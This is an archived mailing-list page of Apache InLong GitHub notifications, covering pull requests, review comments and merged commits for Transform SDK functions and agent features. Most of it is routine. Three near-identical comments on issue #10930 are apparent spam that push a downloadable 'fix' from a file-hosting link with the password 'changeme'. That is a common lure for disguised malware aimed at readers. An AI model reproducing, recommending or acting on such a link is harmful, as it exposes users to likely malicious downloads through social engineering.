Re: [PR] [INLONG-10944][SDK] Support Inlong Transform parser annotation [inlong]

2024-08-28 Thread via GitHub
vernedeng commented on code in PR #10945: URL: https://github.com/apache/inlong/pull/10945#discussion_r1735662565 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/parser/ParserTools.java: ## @@ -0,0 +1,64 @@ +package org.apache.inlong.sdk.transfo

[PR] [INLONG-10944][SDK] Support Inlong Transform parser annotation [inlong]

2024-08-28 Thread via GitHub
emptyOVO opened a new pull request, #10945: URL: https://github.com/apache/inlong/pull/10945 Fixes #10944 ### Motivation Implement annotation support for parser,Reference was made to the implementation of #10929 ### Modifications ###

(inlong) branch master updated: [INLONG-10847][Dashboard] Agent type cluster node management adds restart、reinstall, install log 、heartbeat detection and unLoad operations (#10926)

2024-08-28 Thread aloyszhang
This is an automated email from the ASF dual-hosted git repository. aloyszhang pushed a commit to branch master in repository https://gitbox.apache.org/repos/asf/inlong.git The following commit(s) were added to refs/heads/master by this push: new 4cf7ccba60 [INLONG-10847][Dashboard] Agent t

Re: [PR] [INLONG-10847][Dashboard] Agent type cluster node management adds restart、reinstall, install log 、heartbeat detection and unLoad operations [inlong]

2024-08-28 Thread via GitHub
aloyszhang merged PR #10926: URL: https://github.com/apache/inlong/pull/10926 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@inlong

Re: [PR] [INLONG-10287][Agent] Update the Redis Source [inlong]

2024-08-28 Thread via GitHub
justinwwhuang commented on code in PR #10801: URL: https://github.com/apache/inlong/pull/10801#discussion_r1735556446 ## inlong-agent/agent-plugins/src/main/java/org/apache/inlong/agent/plugin/sources/RedisSource.java: ## @@ -17,54 +17,169 @@ package org.apache.inlong.agent.p

[PR] [INLONG-10942][SDK] Add official function names for all Transform functions [inlong]

2024-08-28 Thread via GitHub
Zkplo opened a new pull request, #10943: URL: https://github.com/apache/inlong/pull/10943 Fixes #10942 ### Motivation Added official SQL functions for DateExtractFunction, FromUnixTimeFunction, and TimestampAdFunction classes ### Verifying this change

[PR] [INLONG-10939][SDK] Transform SQL supports STRCMP function [inlong]

2024-08-28 Thread via GitHub
Zkplo opened a new pull request, #10941: URL: https://github.com/apache/inlong/pull/10941 Fixes #10939 ### Motivation Add one function classe: STRCMP . Also, add the corresponding unit test codes. ### Verifying this change *(Please pick either of

Re: [PR] [INLONG-7056][Sort] Adjust sort resources according to data scale [inlong]

2024-08-28 Thread via GitHub
PeterZh6 commented on code in PR #10916: URL: https://github.com/apache/inlong/pull/10916#discussion_r1734771225 ## inlong-audit/audit-common/src/main/java/org/apache/inlong/audit/consts/OpenApiConstants.java: ## @@ -15,7 +15,7 @@ * limitations under the License. */ -packa

Re: [PR] [INLONG-7056][Sort] Adjust sort resources according to data scale [inlong]

2024-08-28 Thread via GitHub
PeterZh6 commented on code in PR #10916: URL: https://github.com/apache/inlong/pull/10916#discussion_r1734688395 ## inlong-manager/manager-plugins/base/src/main/java/org/apache/inlong/manager/plugin/flink/FlinkParallelismOptimizer.java: ## @@ -0,0 +1,220 @@ +/* + * Licensed to t

(inlong) branch master updated: [INLONG-10929][SDK] Support Inlong Transform function annotation (#10936)

2024-08-28 Thread luchunliang
This is an automated email from the ASF dual-hosted git repository. luchunliang pushed a commit to branch master in repository https://gitbox.apache.org/repos/asf/inlong.git The following commit(s) were added to refs/heads/master by this push: new 02a3815b43 [INLONG-10929][SDK] Support Inlo

Re: [PR] [INLONG-10929][SDK] Support Inlong Transform function annotation [inlong]

2024-08-28 Thread via GitHub
luchunliang merged PR #10936: URL: https://github.com/apache/inlong/pull/10936 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@inlon

[PR] [INLONG-10935][SDK] Transform support DAYNAME function [inlong]

2024-08-28 Thread via GitHub
ying-hua opened a new pull request, #10937: URL: https://github.com/apache/inlong/pull/10937 Fixes #10935 ### Motivation - Add a type DAY_NAME in class DateExtractFunction, implement DAYNAME function and its unit test. - DAYNAME(date) Returns the name

Re: [PR] [INLONG-10902][SDK] Transform support HEX(numeric or string) function [inlong]

2024-08-28 Thread via GitHub
emptyOVO commented on code in PR #10904: URL: https://github.com/apache/inlong/pull/10904#discussion_r1734358519 ## inlong-sdk/transform-sdk/src/test/java/org/apache/inlong/sdk/transform/process/TestTransformArithmeticFunctionsProcessor.java: ## @@ -619,4 +619,33 @@ public void

Re: [PR] [INLONG-10902][SDK] Transform support HEX(numeric or string) function [inlong]

2024-08-28 Thread via GitHub
emptyOVO commented on code in PR #10904: URL: https://github.com/apache/inlong/pull/10904#discussion_r1734354903 ## inlong-sdk/transform-sdk/src/test/java/org/apache/inlong/sdk/transform/process/TestTransformArithmeticFunctionsProcessor.java: ## @@ -619,4 +619,33 @@ public void

[PR] [INLONG-10929][SDK] Support Inlong Transform function annotation [inlong]

2024-08-28 Thread via GitHub
vernedeng opened a new pull request, #10936: URL: https://github.com/apache/inlong/pull/10936 Fixes #10929 ### Motivation ### Modifications ### Verifying this change *(Please pick either of the following options)* - [ ] This c

Re: [PR] [INLONG-10902][SDK] Transform support HEX(numeric or string) function [inlong]

2024-08-28 Thread via GitHub
emptyOVO commented on code in PR #10904: URL: https://github.com/apache/inlong/pull/10904#discussion_r1734342521 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java: ## @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Softwa

Re: [PR] [INLONG-10902][SDK] Transform support HEX(numeric or string) function [inlong]

2024-08-28 Thread via GitHub
emptyOVO commented on code in PR #10904: URL: https://github.com/apache/inlong/pull/10904#discussion_r1734342521 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java: ## @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Softwa

Re: [PR] [INLONG-10902][SDK] Transform support HEX(numeric or string) function [inlong]

2024-08-28 Thread via GitHub
emptyOVO commented on code in PR #10904: URL: https://github.com/apache/inlong/pull/10904#discussion_r1734342521 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java: ## @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Softwa

Re: [PR] [INLONG-10927][SDK] Transform supports padding of left and right strings [inlong]

2024-08-28 Thread via GitHub
Zkplo commented on code in PR #10928: URL: https://github.com/apache/inlong/pull/10928#discussion_r1734324789 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/LpadFunction.java: ## @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Software

Re: [PR] [INLONG-10930][SDK] Transform support DAYOFWEEK function [inlong]

2024-08-28 Thread via GitHub
aloyszhang merged PR #10933: URL: https://github.com/apache/inlong/pull/10933 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@inlong

(inlong) branch master updated: [INLONG-10930][SDK] Transform support DAYOFWEEK function (#10933)

2024-08-28 Thread aloyszhang
This is an automated email from the ASF dual-hosted git repository. aloyszhang pushed a commit to branch master in repository https://gitbox.apache.org/repos/asf/inlong.git The following commit(s) were added to refs/heads/master by this push: new 2409da5c66 [INLONG-10930][SDK] Transform sup

Re: [PR] [INLONG-10847][Dashboard] Agent type cluster node management adds restart、reinstall, install log 、heartbeat detection and unLoad operations [inlong]

2024-08-28 Thread via GitHub
fuweng11 commented on PR #10926: URL: https://github.com/apache/inlong/pull/10926#issuecomment-2314697459 Reinstall and other operations require obtaining the latest data. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and us

Re: [PR] [INLONG-10902][SDK] Transform support HEX(numeric or string) function [inlong]

2024-08-28 Thread via GitHub
vernedeng commented on code in PR #10904: URL: https://github.com/apache/inlong/pull/10904#discussion_r1734237089 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/HexFunction.java: ## @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Softw

Re: [PR] [INLONG-10902][SDK] Transform support HEX(numeric or string) function [inlong]

2024-08-28 Thread via GitHub
yfsn666 commented on code in PR #10904: URL: https://github.com/apache/inlong/pull/10904#discussion_r1734230380 ## inlong-sdk/transform-sdk/src/test/java/org/apache/inlong/sdk/transform/process/TestTransformArithmeticFunctionsProcessor.java: ## @@ -619,4 +619,33 @@ public void t

(inlong) branch master updated: [INLONG-10889][Agent] When the oom is detected, the process exits (#10891)

2024-08-28 Thread wenweihuang
This is an automated email from the ASF dual-hosted git repository. wenweihuang pushed a commit to branch master in repository https://gitbox.apache.org/repos/asf/inlong.git The following commit(s) were added to refs/heads/master by this push: new eca3e64e04 [INLONG-10889][Agent] When the o

Re: [PR] [INLONG-10889][Agent] When the oom is detected, the process exits [inlong]

2024-08-28 Thread via GitHub
justinwwhuang merged PR #10891: URL: https://github.com/apache/inlong/pull/10891 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@inl

[PR] [INLONG-10930][SDK] Transform support DAYOFWEEK function [inlong]

2024-08-28 Thread via GitHub
ying-hua opened a new pull request, #10933: URL: https://github.com/apache/inlong/pull/10933 Fixes #10930 ### Motivation Add a type DAY_OF_WEEK in class DateExtractFunction, implement DAYOFWEEK function and its unit test. - DAYOFWEEK(date) Returns the

[PR] [INLONG-10931][Manager] Data preview supports data containing escape characters [inlong]

2024-08-28 Thread via GitHub
fuweng11 opened a new pull request, #10932: URL: https://github.com/apache/inlong/pull/10932 Fixes #10931 ### Motivation Data preview supports data containing escape characters. ### Modifications Using the transform SDK to parse data. --

Re: [PR] [INLONG-10832][SDK] Transform SQL support Translate function [inlong]

2024-08-28 Thread via GitHub
aloyszhang merged PR #10863: URL: https://github.com/apache/inlong/pull/10863 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@inlong

(inlong) branch master updated: [INLONG-10832][SDK] Transform SQL support Translate function (#10863)

2024-08-28 Thread aloyszhang
This is an automated email from the ASF dual-hosted git repository. aloyszhang pushed a commit to branch master in repository https://gitbox.apache.org/repos/asf/inlong.git The following commit(s) were added to refs/heads/master by this push: new 04971c37e9 [INLONG-10832][SDK] Transform SQL

Re: [I] [Feature][SDK] Transform support DAYOFWEEK function [inlong]

2024-08-28 Thread via GitHub
NEKO-JOJUK commented on issue #10930: URL: https://github.com/apache/inlong/issues/10930#issuecomment-2314577694 to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in

Re: [I] [Feature][SDK] Transform support DAYOFWEEK function [inlong]

2024-08-28 Thread via GitHub
qiliq commented on issue #10930: URL: https://github.com/apache/inlong/issues/10930#issuecomment-2314577090 to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in inst

Re: [I] [Feature][SDK] Transform support DAYOFWEEK function [inlong]

2024-08-28 Thread via GitHub
qiliq commented on issue #10930: URL: https://github.com/apache/inlong/issues/10930#issuecomment-2314576627 to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in inst

Re: [PR] [INLONG-10927][SDK] Transform supports padding of left and right strings [inlong]

2024-08-28 Thread via GitHub
yfsn666 commented on code in PR #10928: URL: https://github.com/apache/inlong/pull/10928#discussion_r1734153110 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/LpadFunction.java: ## @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Softwa

Re: [PR] [INLONG-10927][SDK] Transform supports padding of left and right strings [inlong]

2024-08-28 Thread via GitHub
Zkplo commented on code in PR #10928: URL: https://github.com/apache/inlong/pull/10928#discussion_r1734117732 ## inlong-sdk/transform-sdk/src/main/java/org/apache/inlong/sdk/transform/process/function/LpadFunction.java: ## @@ -0,0 +1,74 @@ +/* + * Licensed to the Apache Software

(inlong) branch master updated: [INLONG-10864][SDK] Transform SQL support md5 function (#10865)

2024-08-28 Thread aloyszhang
This is an automated email from the ASF dual-hosted git repository. aloyszhang pushed a commit to branch master in repository https://gitbox.apache.org/repos/asf/inlong.git The following commit(s) were added to refs/heads/master by this push: new 1394dcdbea [INLONG-10864][SDK] Transform SQL

Re: [PR] [INLONG-10864][SDK] Transform SQL support md5 function [inlong]

2024-08-28 Thread via GitHub
aloyszhang merged PR #10865: URL: https://github.com/apache/inlong/pull/10865 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@inlong

Re: [PR] [INLONG-7056][Sort] Adjust sort resources according to data scale [inlong]

2024-08-28 Thread via GitHub
aloyszhang commented on code in PR #10916: URL: https://github.com/apache/inlong/pull/10916#discussion_r1734072686 ## inlong-manager/manager-plugins/base/src/main/java/org/apache/inlong/manager/plugin/flink/enums/Constants.java: ## @@ -43,6 +43,10 @@ public class Constants {